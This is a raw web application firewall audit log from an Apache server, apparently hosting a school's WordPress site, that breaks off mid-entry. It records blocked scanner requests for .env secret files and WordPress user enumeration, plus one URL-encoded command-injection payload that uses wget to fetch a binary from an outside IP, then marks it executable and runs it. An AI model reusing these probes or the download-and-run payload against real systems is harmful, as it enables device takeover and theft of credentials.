(KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d33b1c3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d33b1c3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748862273381319 3459 (- - -) Stopwatch2: 1748862273381319 3459; combined=1442, p1=501, p2=908, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d33b1c3c-Z-- --d7019e34-A-- [02/Jun/2025:18:13:02 +0700] aD2HPu6eDjh4wF4csduE2AAAAJc 103.236.140.4 49916 103.236.140.4 8181 --d7019e34-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Accept-Charset: utf-8 --d7019e34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7019e34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748862782887059 771 (- - -) Stopwatch2: 1748862782887059 771; combined=329, p1=295, p2=0, p3=0, p4=0, p5=34, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7019e34-Z-- --e026e85e-A-- [02/Jun/2025:18:22:19 +0700] aD2Ja-6eDjh4wF4csduFEQAAAJM 103.236.140.4 50198 103.236.140.4 8181 --e026e85e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.207.37.51 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.207.37.51 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --e026e85e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e026e85e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748863339988063 716 (- - -) Stopwatch2: 1748863339988063 716; combined=319, p1=287, p2=0, p3=0, p4=0, p5=31, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e026e85e-Z-- --1c56a060-A-- [02/Jun/2025:18:22:20 +0700] aD2JbH8VMK8tZef_-m_nIAAAAFQ 103.236.140.4 50202 103.236.140.4 8181 --1c56a060-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.207.37.51 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.207.37.51 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --1c56a060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c56a060-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748863340831292 689 (- - -) Stopwatch2: 1748863340831292 689; combined=270, p1=243, p2=0, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c56a060-Z-- --6b2f6216-A-- [02/Jun/2025:18:27:25 +0700] aD2KndG4Cudp_oIcbnPBxwAAABI 103.236.140.4 50416 103.236.140.4 8181 --6b2f6216-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.189.222.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.189.222.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6b2f6216-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b2f6216-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748863645754764 3501 (- - -) Stopwatch2: 1748863645754764 3501; combined=1557, p1=577, p2=949, p3=0, p4=0, p5=31, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b2f6216-Z-- --2f1bb239-A-- [02/Jun/2025:18:28:58 +0700] aD2K-tG4Cudp_oIcbnPBzAAAAAA 103.236.140.4 50430 103.236.140.4 8181 --2f1bb239-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.158.186.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.158.186.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2f1bb239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f1bb239-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748863738903656 3288 (- - -) Stopwatch2: 1748863738903656 3288; combined=1452, p1=503, p2=916, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f1bb239-Z-- --337a6d13-A-- [02/Jun/2025:19:01:53 +0700] aD2SsdG4Cudp_oIcbnPCnwAAAAA 103.236.140.4 51890 103.236.140.4 8181 --337a6d13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 5.104.83.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.104.83.47 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Python/3.13 aiohttp/3.11.18 --337a6d13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --337a6d13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748865713250525 2351 (- - -) Stopwatch2: 1748865713250525 2351; combined=1232, p1=406, p2=796, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --337a6d13-Z-- --609fa301-A-- [02/Jun/2025:19:46:15 +0700] aD2dF9G4Cudp_oIcbnPDOgAAAAQ 103.236.140.4 53390 103.236.140.4 8181 --609fa301-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Accept-Charset: utf-8 --609fa301-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --609fa301-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748868375764920 931 (- - -) Stopwatch2: 1748868375764920 931; combined=422, p1=380, p2=0, p3=0, p4=0, p5=42, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --609fa301-Z-- --014b701c-A-- [02/Jun/2025:20:02:27 +0700] aD2g438VMK8tZef_-m_obwAAAEU 103.236.140.4 54400 103.236.140.4 8181 --014b701c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15 Accept-Charset: utf-8 --014b701c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --014b701c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748869347354093 839 (- - -) Stopwatch2: 1748869347354093 839; combined=372, p1=321, p2=0, p3=0, p4=0, p5=51, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --014b701c-Z-- --a8057210-A-- [02/Jun/2025:20:30:25 +0700] aD2ncX8VMK8tZef_-m_pKAAAAEw 103.236.140.4 55652 103.236.140.4 8181 --a8057210-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 174.80.96.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 174.80.96.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a8057210-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8057210-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748871025108823 3066 (- - -) Stopwatch2: 1748871025108823 3066; combined=1545, p1=491, p2=1012, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8057210-Z-- --e1c72979-A-- [02/Jun/2025:21:10:41 +0700] aD2w4X8VMK8tZef_-m_rBgAAAFA 103.236.140.4 32864 103.236.140.4 8181 --e1c72979-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F141.98.11.175%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20router HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 176.65.148.234 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.148.234 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --e1c72979-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1c72979-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748873441097027 998 (- - -) Stopwatch2: 1748873441097027 998; combined=438, p1=389, p2=0, p3=0, p4=0, p5=49, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1c72979-Z-- --329e5464-A-- [02/Jun/2025:21:11:44 +0700] aD2xIH8VMK8tZef_-m_rDwAAAE4 103.236.140.4 32906 103.236.140.4 8181 --329e5464-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 106.105.218.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 106.105.218.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --329e5464-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --329e5464-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748873504293217 2991 (- - -) Stopwatch2: 1748873504293217 2991; combined=1272, p1=408, p2=830, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --329e5464-Z-- --5f4bff5d-A-- [02/Jun/2025:21:28:45 +0700] aD21He6eDjh4wF4csduJQQAAAJc 103.236.140.4 33830 103.236.140.4 8181 --5f4bff5d-B-- GET /.env.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 137.184.8.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 137.184.8.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --5f4bff5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f4bff5d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748874525255477 721 (- - -) Stopwatch2: 1748874525255477 721; combined=262, p1=233, p2=0, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f4bff5d-Z-- --b800a427-A-- [02/Jun/2025:21:35:58 +0700] aD22zu6eDjh4wF4csduJUQAAAJc 103.236.140.4 34162 103.236.140.4 8181 --b800a427-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b800a427-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b800a427-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748874958774044 691 (- - -) Stopwatch2: 1748874958774044 691; combined=284, p1=256, p2=0, p3=0, p4=0, p5=28, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b800a427-Z-- --7a44b273-A-- [02/Jun/2025:21:47:06 +0700] aD25atG4Cudp_oIcbnPH3QAAAA8 103.236.140.4 34580 103.236.140.4 8181 --7a44b273-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --7a44b273-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a44b273-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748875626569724 861 (- - -) Stopwatch2: 1748875626569724 861; combined=350, p1=302, p2=0, p3=0, p4=0, p5=48, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a44b273-Z-- --c13bd529-A-- [02/Jun/2025:21:47:08 +0700] aD25bH8VMK8tZef_-m_rWwAAAEg 103.236.140.4 34584 103.236.140.4 8181 --c13bd529-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --c13bd529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c13bd529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748875628966894 674 (- - -) Stopwatch2: 1748875628966894 674; combined=266, p1=231, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c13bd529-Z-- --fd74df46-A-- [02/Jun/2025:21:48:35 +0700] aD25w38VMK8tZef_-m_rXAAAAE4 103.236.140.4 34658 103.236.140.4 8181 --fd74df46-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 209.38.208.202 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 209.38.208.202 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --fd74df46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd74df46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748875715603555 830 (- - -) Stopwatch2: 1748875715603555 830; combined=332, p1=299, p2=0, p3=0, p4=0, p5=33, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd74df46-Z-- --6fb5f20d-A-- [02/Jun/2025:22:08:53 +0700] aD2-hUA6be0-boUGPH2hUQAAANM 103.236.140.4 39578 103.236.140.4 8181 --6fb5f20d-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 Accept-Charset: utf-8 --6fb5f20d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fb5f20d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748876933858784 726 (- - -) Stopwatch2: 1748876933858784 726; combined=314, p1=266, p2=0, p3=0, p4=0, p5=48, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fb5f20d-Z-- --bf73370d-A-- [02/Jun/2025:22:10:40 +0700] aD2-8H8VMK8tZef_-m_zNgAAAEc 103.236.140.4 45462 103.236.140.4 8181 --bf73370d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.158.78.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.158.78.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bf73370d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf73370d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity 